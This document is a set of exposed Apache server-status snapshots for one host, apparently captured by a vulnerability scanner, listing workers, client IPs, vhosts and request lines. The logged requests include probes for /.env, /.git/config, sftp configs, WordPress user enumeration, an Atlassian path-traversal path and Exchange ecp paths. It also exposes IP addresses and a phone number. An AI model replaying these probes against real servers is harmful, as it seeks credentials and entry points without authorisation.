127.0.0.1http/1.1 0-01059290/1/1_ 0.15100.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.1646400.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658871390636 HT 0-01059290/2/2_ 0.1745210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934400.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322400.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516710.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05821620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058212170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257600.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19365110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613280.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03180.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04090.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06010.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.1451210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.1837710.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.1837010.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.2222010.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.2611510.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/2/2_ 0.33000.00.070.07 168.143.243.26http/1.1trmm.us:443GET /login.action HTTP/1.1 3-01059500/2/2_ 0.18090.00.000.00 168.143.243.26http/1.1 3-01059500/1/1_ 0.1838580.00.010.01 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 3-01059500/2/2_ 0.2036210.00.010.01 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/1/1_ 0.0236200.00.070.07 127.0.0.1http/1.1 3-01059500/1/1_ 0.2323080.00.010.01 104.28.85.94http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 3-01059500/2/2_ 0.25184810.00.010.01 107.119.41.40http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 3-01059500/1/1_ 0.0810480.00.000.00 23.205.108.74http/1.1 3-01059500/2/2_ 0.288510.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/2/2_ 0.302000.00.000.00 159.89.118.137http/1.1hi5rr.com:80HEAD / HTTP/1.1 3-01059500/2/2_ 0.32000.00.080.08 168.143.243.26http/1.1trmm.us:443GET / HTTP/1.1 3-01059500/2/2_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 3-01059500/2/2_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /about HTTP/1.1 3-01059500/1/1_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 3-01059500/1/1_ 0.18080.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.15http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/1/1_ 0.20000.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.2135590.00.070.07 96.7.74.175http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d3203c648bfb
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:08 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 47 seconds Server load: 1.12 0.80 0.33 Total accesses: 586 - Total Traffic: 7.5 MB CPU Usage: u4.86 s.57 cu0 cs0 - .539% CPU load .582 requests/sec - 7.7 kB/second - 13.1 kB/request 3 requests currently being processed, 177 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no0yes018000 6106024no0yes018000 7106043no3yes018020 8106065no3yes315010 9107415no0yes018000 Sum1007 3177040 ________________________________________________________________ ________________________________________________________________ ____________________W_________WR____________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016990.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516610.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15300.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16100.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516910.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05824620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058232170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257900.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19367110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613480.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03380.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04290.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14210.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.22110.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.2611810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18190.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33100.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.33100.00.010.01 168.143.243.30http/1.1 3-01059500/2/2_ 0.33100.00.070.07 168.143.243.30http/1.1 3-01059500/1/1_ 0.23080.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34200.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34200.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32200.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18180.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20100.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20100.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21090.00.070.07 168.143.243.30http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d32050c592c5
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:28 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 44 seconds Server load: 0.33 0.27 0.15 Total accesses: 863106 - Total Traffic: 13.4 GB CPU Usage: u768.16 s184.09 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 4 requests currently being processed, 176 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no11yes018091 421293no0yes018000 582938no1yes018010 6113967no0yes018000 794980no1yes117000 9107391no0yes216000 11114344no1yes117001 Sum10014 41760102 ________________________________________________________________ ________________________________________________________________ _______W________.................._R_R______________............ ......_R________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00000.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0527210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.233180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00000.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0624130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.753160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0931230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017000.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1131220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9831290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1031190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8965160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98300.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017040.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.002120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0436140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.007160.04.7361.05 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mms.js?20201222 HTTP/1.1 0-0113010/312/4585_ 51.932674480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57090.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.761140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.760150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57080.02.6233.41 168.143.243.26http/1.1 1-095220/205/2756_ 21.7611650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61100.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.30http/1.1 1-095220/206/2840_ 21.761150.01.4531.69 168.143.243.30http/1.1 1-095220/203/2806_ 21.750160.04.0043.00 168.143.243.26http/1.1 1-095220/210/2816_ 21.71120.01.4037.52 168.143.243.30http/1.1 1-095220/199/2793_ 21.750110.08.4739.67 168.143.243.26http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.26http/1.1 1-095220/204/2834_ 21.761140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98310.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9731220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99160.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89021910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.983330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.9063750.03.7921.42 96.7.74.180http/1.1 2-01220760/383/3037_ 42.51300.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.6663780.04.1733.73 96.7.74.180http/1.1 2-01220760/369/3021_ 42.90020.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51300.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.9136140.03.9424.64 127.0.0.1http/1.1 2-01220760/384/3025_ 42.95320.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.973320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.9163160.05.0234.70 96.7.74.180http/1.1 2-01220760/382/2988_ 42.9063150.05.2042.40 96.7.74.180http/1.1 2-01220760/377/3028_ 43.061522350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98140.06.4526.98 168.143.243.30http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d320a8b18725
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:29 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 45 seconds Server load: 0.33 0.27 0.15 Total accesses: 863165 - Total Traffic: 13.4 GB CPU Usage: u768.41 s184.1 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 4 requests currently being processed, 176 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no8yes216070 421293no0yes018000 582938no1yes018010 6113967no0yes018000 794980no1yes117000 9107391no0yes018000 11114344no1yes117000 Sum10011 4176080 ______________________________________________________WW________ ________________________________________________________________ ______________W_..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00100.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0528210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.234180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00100.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0625130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.754160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0941230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017100.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1131220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9831290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1041190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8966160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98300.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017140.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.003120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0437140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00060.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932674480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57090.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.760140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.760150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57080.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7601650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61000.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57100.03.9835.41 168.143.243.30http/1.1 1-095220/206/2840_ 21.760150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.751160.04.0043.00 168.143.243.26http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.26http/1.1 1-095220/199/2793_ 21.751110.08.4739.67 168.143.243.26http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.741103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.741150.02.2841.49 168.143.243.26http/1.1 1-095220/204/2834_ 21.760140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98410.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9741220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99160.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89121910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.984330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.900750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51400.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.660780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90120.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51400.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.9137140.03.9424.64 127.0.0.1http/1.1 2-01220760/384/3025_ 42.95420.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.974320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.910160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.900150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061622350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98240.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d320bdc7ba49
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:25 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 26 seconds Server load: 0.24 0.20 0.23 Total accesses: 8186333 - Total Traffic: 207.0 GB CPU Usage: u1337.82 s208.79 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 15 requests currently being processed, 183 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no9yes315060 123840no4yes315001 286508no2yes216000 3109764no1yes018000 4116801no3yes117010 533086no1yes117000 621767no5yes414010 7125209no0yes018000 8115169no0yes018000 943856no0yes018000 10129613no3yes117010 Sum11028 15183091 ________W_W____R___W______R________W_R______R___________________ ______________W__________________W____________R_W__________LW___ ________________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/212/40348_ 17.98000.03.69868.70 96.7.74.175http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/249/40343_ 17.98000.03.87867.78 96.7.74.198http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/262/40558_ 18.01000.02.13988.52 96.7.74.175http/1.1localhost:80GET /.vscode/sftp.json HTTP/1.1 0-0987300/225/40521L 17.95010.01.22854.96 96.7.74.175http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0987300/228/40327_ 17.98010.01.14924.78 96.7.74.175http/1.1trmm.us:80GET / HTTP/1.1 0-0987300/247/40609_ 17.97000.04.53963.21 96.7.74.198http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 0-0987300/248/40599_ 18.01000.04.04887.13 96.7.74.198http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/251/40504_ 18.000120.01.44781.02 96.7.74.198http/1.1localhost:80GET /server-status HTTP/1.1 0-0987300/240/40607W 17.94000.03.95985.87 96.7.74.198http/1.1localhost:80GET /server-status HTTP/1.1 0-0987300/224/40497_ 17.98000.01.25830.92 96.7.74.198http/1.1trmm.us:80GET /.env HTTP/1.1 0-0987300/243/40326W 17.111900.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/222/40299_ 18.010340.01.14835.99 96.7.74.198http/1.1localhost:80GET /info.php HTTP/1.1 0-0987300/218/40506_ 17.97000.01.55867.49 96.7.74.175http/1.1trmm.us:80GET /.vscode/sftp.json HTTP/1.1 0-0987300/240/40376_ 17.98000.01.45907.11 96.7.74.175http/1.1localhost:80GET /.git/config HTTP/1.1 0-0987300/230/40492W 17.96000.01.16854.63 96.7.74.175http/1.1localhost:80GET / HTTP/1.1 0-0987300/228/40500W 17.95000.03.95940.81 96.7.74.198http/1.1localhost:80GET /info.php HTTP/1.1 0-0987300/235/40614_ 17.98000.04.05843.94 96.7.74.175http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0987300/214/40451_ 17.970130.04.03869.38 96.7.74.175http/1.1localhost:80GET /server-status HTTP/1.1 1-0238400/573/38292_ 101.89400.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079W 101.61100.07.84873.27 174.240.149.27http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/556/38211_ 101.85400.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.834120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54420.011.57932.12 96.7.74.175http/1.1 1-0238400/559/38023_ 102.002160.07.38887.80 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58400.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.624850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55514710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.534280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.504120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84400.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.814140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46410.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85400.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.994210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87400.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462700.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43400.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29500.013.07881.75 174.240.149.27http/1.1 2-0865080/195/39005_ 34.405110.08.18943.61 96.7.74.175http/1.1 2-0865080/185/38748_ 34.31400.07.62899.51 96.7.74.198http/1.1 2-0865080/198/38908_ 34.54010.07.15850.79 96.7.74.198http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0865080/190/38922_ 34.20410.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.815140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.934180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.645170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/188/38769_ 